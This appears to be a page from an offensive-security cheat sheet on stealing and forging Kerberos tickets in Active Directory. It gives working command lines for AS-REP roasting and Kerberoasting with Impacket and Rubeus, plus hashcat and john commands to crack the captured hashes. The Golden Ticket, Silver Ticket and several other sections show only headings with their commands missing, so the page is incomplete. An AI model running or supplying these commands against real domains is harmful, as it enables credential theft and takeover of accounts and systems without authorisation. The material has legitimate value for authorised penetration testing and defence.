Steal or Forge Kerberos Tickets

AS-REP Roasting

Check ASREPRoast for all domain users (credentials required)

GetNPUsers.py <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>

Check ASREPRoast for a list of users (no credentials required)

GetNPUsers.py <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>

Check ASREPRoast for all users in current domain

.\Rubeus.exe asreproast  /format:<AS_REP_responses_format [hashcat | john]> /outfile:<output_hashes_file>

Cracking with dictionary of passwords:

hashcat -m 18200 -a 0 <AS_REP_responses_file> <passwords_file>
john --wordlist=<passwords_file> <AS_REP_responses_file>

Kerberoasting

Impacket

GetUserSPNs.py <domain_name>/<domain_user>:<domain_user_password> -outputfile <output_TGSs_file>

Rubeus

.\Rubeus.exe kerberoast /outfile:<output_TGSs_file>

PowerShell

Cracking with dictionary of passwords:

Golden Ticket

Impacket

Mimikatz

To generate the TGT with NTLM

To generate the TGT with AES 128 key

To generate the TGT with AES 256 key (more secure encryption, probably more stealth due is the used by default by Microsoft)

Inject TGT with Mimikatz

Rubeus

Execute a cmd in the remote machine:

Misc

To get NTLM from password:

Silver Ticket

Impacket

Mimikatz

To generate the TGS with NTLM

To generate the TGS with AES 128 key

To generate the TGS with AES 256 key (more secure encryption, probably more stealth due is the used by default by Microsoft)

Inject TGS with Mimikatz

Rubeus

Execute a cmd in the remote machine with PsExecarrow-up-right:

Last updated

Was this helpful?